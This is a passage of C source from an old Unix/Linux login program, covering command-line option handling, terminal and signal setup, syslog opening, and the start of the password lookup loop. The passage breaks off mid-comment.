            /* Just as arbitrary as mountain time: */

        /* (void)setenv("TZ", "MET-1DST",0); */

#endif

 

            (void)signal(SIGALRM, timedout);

            (void)alarm((unsigned int)timeout);

            (void)signal(SIGQUIT, SIG_IGN);

            (void)signal(SIGINT, SIG_IGN);

 

            (void)setpriority(PRIO_PROCESS, 0, 0);

#ifdef HAVE_QUOTA

            (void)quota(Q_SETUID, 0, 0, 0);

#endif

 

            /*

             * -p is used by getty to tell login not to destroy the environment

             * -f is used to skip a second login authentication

             * -h is used by other servers to pass the name of the remote

             *    host to login so that it may be placed in utmp and wtmp

             */

            (void)gethostname(tbuf, sizeof(tbuf));

            (void)strncpy(thishost, tbuf, sizeof(thishost)-1);

            domain = index(tbuf, '.');

 

            fflag = hflag = pflag = 0;

            passwd_req = 1;

            while ((ch = getopt(argc, argv, "fh:p")) != EOF)

                        switch (ch) {

                        case 'f':

                                    fflag = 1;

                                    break;

 

                        case 'h':

                                    if (getuid()) {

                                                (void)fprintf(stderr,

                                                    "login: -h for super-user only.\n");

                                                exit(1);

                                    }

                                    hflag = 1;

                                    if (domain && (p = index(optarg, '.')) &&

                                        strcasecmp(p, domain) == 0)

                                                *p = 0;

                                    hostname = optarg;

                                    break;

 

                        case 'p':

                                    pflag = 1;

                                    break;

                        case '?':

                        default:

                                    (void)fprintf(stderr,

                                        "usage: login [-fp] [username]\n");

                                    exit(1);

                        }

            argc -= optind;

            argv += optind;

            if (*argv) {

                        username = *argv;

                        ask = 0;

            } else

                        ask = 1;

 

#ifndef linux

            ioctlval = 0;

            (void)ioctl(0, TIOCLSET, &ioctlval);

            (void)ioctl(0, TIOCNXCL, 0);

            (void)fcntl(0, F_SETFL, ioctlval);

            (void)ioctl(0, TIOCGETP, &sgttyb);

            sgttyb.sg_erase = CERASE;

            sgttyb.sg_kill = CKILL;

            (void)ioctl(0, TIOCSLTC, &ltc);

            (void)ioctl(0, TIOCSETC, &tc);

            (void)ioctl(0, TIOCSETP, &sgttyb);

 

            /*

             * Be sure that we're in

             * blocking mode!!!

             * This is really for HPUX

             */

        ioctlval = 0;

        (void)ioctl(0, FIOSNBIO, &ioctlval);

#endif

 

            for (cnt = getdtablesize(); cnt > 2; cnt--)

                        close(cnt);

 

            ttyn = ttyname(0);

            if (ttyn == NULL || *ttyn == '\0') {

                        (void)sprintf(tname, "%s??", _PATH_TTY);

                        ttyn = tname;

            }

 

            setpgrp();

 

            {

                struct termios tt, ttt;

 

                tcgetattr(0, &tt);

                ttt = tt;

                ttt.c_cflag &= ~HUPCL;

 

                if((chown(ttyn, 0, 0) == 0) && (chmod(ttyn, 0622) == 0)) {

                        tcsetattr(0,TCSAFLUSH,&ttt);

                        signal(SIGHUP, SIG_IGN); /* so vhangup() wont kill us */

                        vhangup();

                        signal(SIGHUP, SIG_DFL);

                }

 

                setsid();

 

                /* re-open stdin,stdout,stderr after vhangup() closed them */

                /* if it did, after 0.99.5 it doesn't! */

                opentty(ttyn);

                tcsetattr(0,TCSAFLUSH,&tt);

            }

 

            if (tty = rindex(ttyn, '/'))

                        ++tty;

            else

                        tty = ttyn;

 

            openlog("login", LOG_ODELAY, LOG_AUTH);

 

            for (cnt = 0;; ask = 1) {

                        ioctlval = 0;

#ifndef linux

                        (void)ioctl(0, TIOCSETD, &ioctlval);

#endif

 

                        if (ask) {

                                    fflag = 0;

                                    getloginname();

                        }

 

                        checktty(username, tty);

 

                        (void)strcpy(tbuf, username);

                        if (pwd = getpwnam(username))

                                    salt = pwd->pw_passwd;

                        else

                                    salt = "xx";

 

                        /* if user not super-user, check for d

 

1